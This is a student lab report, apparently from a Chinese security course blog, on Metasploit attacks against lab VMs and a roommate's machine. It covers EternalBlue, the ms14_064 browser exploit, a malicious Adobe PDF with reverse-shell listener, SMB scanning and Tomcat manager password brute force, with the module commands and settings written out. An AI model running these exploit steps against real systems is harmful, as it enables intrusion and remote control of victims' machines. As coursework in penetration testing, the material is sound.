20202418 2022-2023-2 《网络与系统攻防技术》实验六实验报告

1.实验内容

掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
1.1 使用永恒之蓝漏洞(MS17-010)对靶机进行主动攻击;
1.2 使用ms14_064漏洞针对浏览器进行攻击;
1.3 使用Adobe发动针对客户端的攻击;
1.4 成功应用SMB Version Detection
1.5 使用msf发起一个针对tomcat的攻击

2.实验过程

2.1 使用永恒之蓝漏洞(MS17-010)对靶机进行主动攻击

靶机(windowsxp):172.16.211.75

2.1.1 使用nessus对靶机进行漏洞扫描

使用上一次使用的Nessus中的Basic Network Scan的选项。
在这里插入图片描述
输入靶机的ip地址,点击launch,开始扫描目标主机对应的漏洞。
在这里插入图片描述
发现有个红的,点击查看,是风靡一时的永恒之蓝漏洞!
在这里插入图片描述

2.1.2 打开msfconsole,search寻找模块

使用指令:
search ms09-001
在这里插入图片描述
挑选我们期望的模式
在这里插入图片描述

2.1.2 调整参数

如图,输入
set 想要调整的参数 参数名称
将攻击的主机调整为我们的靶机ip地址
在这里插入图片描述

2.1.3 run发动攻击

如上图所示,有的模块是不可以的,当然我们也不知道一开始应该使用哪个模块,就穷举尝试一下即可。
发现use1是可以的。
在这里插入图片描述
如上图红色框框可见,已经成功发动了攻击,成功获得了目标主机的shell。

2.2 使用ms14_064漏洞针对浏览器进行攻击

2.2.1 search寻找模块并选择相关模块、配置参数

这里是搜索相关模块之后,依据名字(如:windows、brower等)选择对应的模块。

use exploit/windows/browser/ms14_064_ole_code_execution # 选择攻击使用模块
set SRVHOST 172.16.211.203 # 设置攻击机ip,隐藏自身
set LHOST 172.16.211.203
set LPORT 2418
exploit #发起渗透攻击
在这里插入图片描述

结果如图,会产生一个网址。
在这里插入图片描述

2.2.2 “诱导”靶机打开网址

靶机是我自己的,我选择直接复制粘贴。
在这里插入图片描述

2.2.3 在攻击主机查看链接并获得shell

sessions # 列出会话
sessions -i 2 # 进入与靶机的连接,即获取到的shell

在这里插入图片描述
在这里插入图片描述

2.3 使用Adobe发动针对客户端的攻击

攻击主机(kali):192.168.1.102

2.3.1 生成攻击文件

攻击过程和上述过程十分类似。也是先search 对应的攻击模块,根据关键字选择我们想要的攻击模块,之后使用show options查看需要修改哪些参数,最后修改对应的参数运行生成攻击文件。在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

2.3.2 以某种方法将pdf文档传送至靶机上

可以通过社会工程学方法、U盘硬盘等物理存储硬件、趁对方不注意直接导入的方法诱导靶机以Adobe Reader 9.3(版本在8.2.4-9.3.4之间即可)的打开方式打开pdf文档。
在这里插入图片描述

2.3.3 在攻击主机上开启监听

use exploit/multi/handler
set LPORT 4444 # 与前面使用攻击模块时配置的LPORT要一致,默认为4444
set LHOST 192.168.1.102 # 与前面使用攻击模块时配置的LHOST要一致
run

2.3.4 诱导靶机打开pdf文档,获得shell

如图所示,在使用Adobe Reader打开pdf文档后,会卡机。此时在攻击主机上则会显示监听成功,成功获取目标主机的shell。

2.4 SMB Version Detection

2.4.1 模块介绍

SMB(ServerMessageBlock)协议作为一种局域网文件共享传输协议,常被用来作为共享文件安全传输研究的平台。
但是,SMB协议中采用控制文件安全传输的机制是使用客户身份验证的方式,通过客户端向服务器端发送验证密码来获取文件传输的权限。
针对该机制的网络攻击相对严重,攻击程序通过对验证密码的截获来窃取文件的访问权限,局域网下文件传输的安全性得不到保障。
使用Metasploit渗透框架可以进行SMB服务版本扫描。

2.4.2 参数设置

use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.112 # 设置靶机IP

在这里插入图片描述

2.4.3 扫描结果

[*] 192.168.1.112:445 ——SMB Detected (versions:1) (preferred dialect:) (signatures:optional)Windows XP SP3 (language:English) (name:20202418-0D56B9) (workgroup:WORKGROUP)
[+] 192.168.1.112:445Host is running SMB Detected (versions:1) (preferred dialect:) (signatures:optional)WindowsXP SP3 (language:English) (name:20202418-0b56B9)(workgroup:20202418URKORwuP)

可以发现他直接把我电脑的信息都扫出来了!很厉害!甚至能看出来我电脑的语言、名称、工作组等。

2.5 使用msf一个针对tomcat的攻击

tomcat弱口令漏洞:Tomcat支持后台部署War文件,默认情况下管理页面仅允许本地访问,如果网站运维/开发人员手动修改配置文件中的信息允许远程IP进行访问(需求),且恶意攻击者拿到管理界面账户密码情况下,则可上传木马文件,控制系统。在tomcat8环境下默认进入后台的密码为tomcat/tomcat,未修改造成未授权即可进入后台,或者管理员把密码设置成弱口令, 使用工具对其进行穷举。得到密码后,也可以进行后台上传恶意代码控制服务器。

靶机(蔡步越同学的电脑 win10系统):192.168.1.106

2.5.1 靶机环境的配置

详情参考这篇博客(https://blog.csdn.net/weixin_45253622/article/details/114433601),我在我的舍友蔡步越同学的主机上开启了tomcat服务,把后台身份验证的证号和密码都设置成了tomcat,并关闭了他的防火墙。
在这里插入图片描述

2.5.2 使用nmap对目标主机进行扫描

输入 nmap -sV 192.168.1.106,查询目标靶机是否开启了tomcat服务。通过下图可以看出,tomcat所属的8180端口已经被打开了.
在这里插入图片描述

2.5.3 按照之前的流程 发动攻击

search tomcat
show options
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt ————密码字典
set USER_FILE /usr/share/metasploit- framework/data/wordlists/tomcat_mgr_default_users.txt ————用户字典
在这里插入图片描述
第一次发动攻击失败!(失败原因见分析)
在这里插入图片描述

2.5.4 重新配置靶机环境 终于攻击成功

如图所示,成功获得了我们想要的账号和密码!
在这里插入图片描述

3.问题及解决方案

  • 问题1:在使用Adobe发动针对客户端的攻击时失败,靶机成功打开了pdf文件,未发生漏洞
  • 问题1解决方案:Adobe的版本一定要在8.2.4-9.3.4之间!否则攻击不会成功。
  • 问题2: 在tomcat实验中,首次攻击未成功,显示Authorization not requested
  • 问题2解决方案:在tomcat中,远程认证默认是关闭的,因此要修改配置文件,打开能够远程攻击的权限。具体的配置步骤放在参考材料中了。

4.学习感悟、思考等

在这次实验中,我学习了metasploit的基本应用方式,重点掌握了三种攻击方式的思路。在完成任务的过程中,我遇到了很多困难和挑战。尤其是在针对浏览器和客户端的攻击中,由于漏洞的不断更新和修复,我需要不断地寻找最新的漏洞并进行尝试。我还学习了如何使用辅助模块,这些模块可以帮助我更加高效地进行攻击和渗透测试。总的来说,这次计算机实验让我受益匪浅。通过实践,我不仅掌握了metasploit的基本应用方式,还深入了解了网络安全的重要性和攻击的原理。我相信,在今后的学习和工作中,这些知识和经验都会对我有很大的帮助。

参考资料

  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值